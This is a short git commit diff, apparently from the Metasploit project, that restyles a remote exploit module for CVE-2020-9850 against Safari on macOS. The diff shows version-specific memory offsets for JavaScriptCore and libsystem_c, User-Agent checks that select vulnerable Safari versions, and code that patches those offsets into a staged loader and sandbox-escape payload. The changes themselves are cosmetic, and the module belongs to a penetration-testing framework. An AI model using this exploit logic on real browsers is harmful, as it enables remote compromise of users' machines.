fix
This commit is contained in:
Tim W
@@ -414,38 +414,38 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
def offset_table
|
||||
{
|
||||
'placeholder' => {
|
||||
:jsc_confstr_stub => 0x0FF5370041414141,
|
||||
:jsc_llint_entry_call => 0x0FF5370041414142,
|
||||
:libsystem_c_confstr => 0x0FF5370041414143,
|
||||
:libsystem_c_dlopen => 0x0FF5370041414144,
|
||||
:libsystem_c_dlsym => 0x0FF5370041414145,
|
||||
jsc_confstr_stub: 0x0FF5370041414141,
|
||||
jsc_llint_entry_call: 0x0FF5370041414142,
|
||||
libsystem_c_confstr: 0x0FF5370041414143,
|
||||
libsystem_c_dlopen: 0x0FF5370041414144,
|
||||
libsystem_c_dlsym: 0x0FF5370041414145
|
||||
},
|
||||
'10.15.3' => {
|
||||
:jsc_confstr_stub => 0xE7D8B4,
|
||||
:jsc_llint_entry_call => 0x361f13,
|
||||
:libsystem_c_confstr => 0x2644,
|
||||
:libsystem_c_dlopen => 0x80430,
|
||||
:libsystem_c_dlsym => 0x80436,
|
||||
jsc_confstr_stub: 0xE7D8B4,
|
||||
jsc_llint_entry_call: 0x361f13,
|
||||
libsystem_c_confstr: 0x2644,
|
||||
libsystem_c_dlopen: 0x80430,
|
||||
libsystem_c_dlsym: 0x80436
|
||||
},
|
||||
'10.15.4' => {
|
||||
:jsc_confstr_stub => 0xF96446,
|
||||
:jsc_llint_entry_call => 0x380a1d,
|
||||
:libsystem_c_confstr => 0x2be4,
|
||||
:libsystem_c_dlopen => 0x8021e,
|
||||
:libsystem_c_dlsym => 0x80224,
|
||||
jsc_confstr_stub: 0xF96446,
|
||||
jsc_llint_entry_call: 0x380a1d,
|
||||
libsystem_c_confstr: 0x2be4,
|
||||
libsystem_c_dlopen: 0x8021e,
|
||||
libsystem_c_dlsym: 0x80224
|
||||
}
|
||||
}
|
||||
end
|
||||
|
||||
def get_offsets(user_agent)
|
||||
if user_agent =~ /Intel Mac OS X (.*?)\)/
|
||||
osx_version = $1.gsub("_", ".")
|
||||
if user_agent =~ /Version\/(.*?) /
|
||||
if Gem::Version.new($1) > Gem::Version.new('13.1')
|
||||
print_warning "Safari version #{$1} is not vulnerable"
|
||||
osx_version = Regexp.last_match(1).gsub('_', '.')
|
||||
if user_agent =~ %r{Version/(.*?) }
|
||||
if Gem::Version.new(Regexp.last_match(1)) > Gem::Version.new('13.1')
|
||||
print_warning "Safari version #{Regexp.last_match(1)} is not vulnerable"
|
||||
return false
|
||||
else
|
||||
print_good "Safari version #{$1} appears to be vulnerable"
|
||||
print_good "Safari version #{Regexp.last_match(1)} appears to be vulnerable"
|
||||
end
|
||||
end
|
||||
mac_osx_version = Gem::Version.new(osx_version)
|
||||
@@ -459,7 +459,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
print_warning "No offsets for version #{mac_osx_version}"
|
||||
end
|
||||
else
|
||||
print_warning "Unexpected User-Agent"
|
||||
print_warning 'Unexpected User-Agent'
|
||||
end
|
||||
return false
|
||||
end
|
||||
@@ -490,7 +490,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
||||
stage1 = exploit_data 'CVE-2020-9850', 'loader.bin'
|
||||
stage2 = exploit_data 'CVE-2020-9850', 'sbx.bin'
|
||||
|
||||
offset_table['placeholder'].each do |k,v|
|
||||
offset_table['placeholder'].each do |k, v|
|
||||
placeholder_index = stage1.index([v].pack('Q'))
|
||||
stage1[placeholder_index, 8] = [offsets[k]].pack('Q')
|
||||
end
|
||||
|
||||
Reference in New Issue
Block a user